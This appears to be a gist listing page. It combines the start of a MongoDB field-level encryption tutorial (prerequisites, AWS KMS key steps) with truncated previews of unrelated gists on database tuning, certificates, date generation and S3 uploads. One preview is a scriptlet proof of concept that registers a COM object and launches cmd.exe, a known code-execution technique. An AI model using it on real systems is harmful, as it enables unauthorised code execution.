- You have an accessible MongoDB deployment already running and accessible (self-managed or in Atlas)
- You have the modern MongoDB Shell (
mongosh
) installed locally on your workstation - You have a KMIP Server running and accessible, if you don't intend to use a local keyfile (for an example of running and configuring a Hashicorp Vault development instance, see: Hashicorp Vault Configuration For MongoDB KMIP Use)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[{ | |
"name": "Angela Merkel", | |
"dob": { | |
"$date": { | |
"$numberLong": "-487900800000" | |
} | |
}, | |
"phone": "+49 30 182722720", | |
"address": { | |
"street": "Willy-Brandt-Straße 1", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ulimit -a | |
# sudo sysctl net.ipv4.tcp_fastopen=3 | |
# sudo sysctl vm.max_map_count=524288 | |
# note: "-l" (max locked memory) has no soft limit | |
# apt-get install numactl | |
sudo sh -c "sysctl -w net.ipv4.tcp_fastopen=3 ; \ | |
sysctl -w vm.max_map_count=524288 ; \ | |
ulimit -l unlimited ; \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Regular expression for Sublime to find & replace and add double quotes | |
"$numberLong": 706213333988 | |
to | |
"$numberLong": "706213333988" | |
Use this (make sure the [.*] button on the left is pressed) | |
Find: \$numberLong": (.*) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Create a native Javascript Date object set to UTC 00:00:00 timestamp | |
// Here, the default parameters create a plausible DOB | |
function randomDate( start = new Date(1935, 0, 1), end = new Date(2004, 0, 1) ) { | |
var dt = new Date(+start + Math.random() * (end - start)); | |
dt.setUTCHours(0,0,0,0); | |
return dt; | |
} | |
// Random DOB |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# This should be executed in a folder in your Linux Files namespace | |
# You can move these later, but you'll need to reference the files in nginx/apache later | |
# I chose: /home/kenn/nginx_tmp but /etc/nginx/xxx or /etc/ssl/xxx is probably better | |
# Just make sure to verify/chown to nginx-readable perms | |
# Generate RSA signing keys for RSA certs | |
# openssl genrsa -out rootCA.key 4096 | |
# openssl genrsa -out server.key 4096 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
CSFLE explicit encryption golang Hello World example | |
brew install mongodb/brew/libmongocrypt | |
go get go.mongodb.org/mongo-driver/mongo | |
go get go.mongodb.org/mongo-driver/bson | |
go get go.mongodb.org/mongo-driver/mongo/options | |
go get go.mongodb.org/mongo-driver/mongo/readpref |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="Empire" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# | |
# Upload a file to the Amazon S3 service | |
# Usage: | |
# neckbeard-push FILE S3_BUCKET [-a ACL_POLICY] [-i AWS_ACCESS_ID] [-k AWS_SECRET_KEY] [-d debug] [-l write verbose session log] | |
# Note: If option -l is requested, curl_session.log contains SSL handshake *and* plaintext AWS keys | |
# | |
# Ex 1: neckbeard-push foo.log my-bucket -a public-read (with env vars: $AWS_ACCESS_ID & $AWS_SECRET_KEY) | |
# Ex 2: neckbeard-push foo.log my-bucket -a private -i AKIXXXXX -k aBcDeFgHxxx -d | |
# |
Note: See KMS Best Practices guide for more specific guidance:
You should work to ensure that the corresponding key policies follow a model of least privilege. This includes ensuring that you do NOT include
kms:*
permissions in an IAM policy.
Note: This tutorial will create both an AWS KMS master key as well as a local key. If planning to use only a local key, skip to Step 4.
- In the AWS management console, create a project-specific master key:
- Key Management Service (KMS) / Customer managed keys / Create a key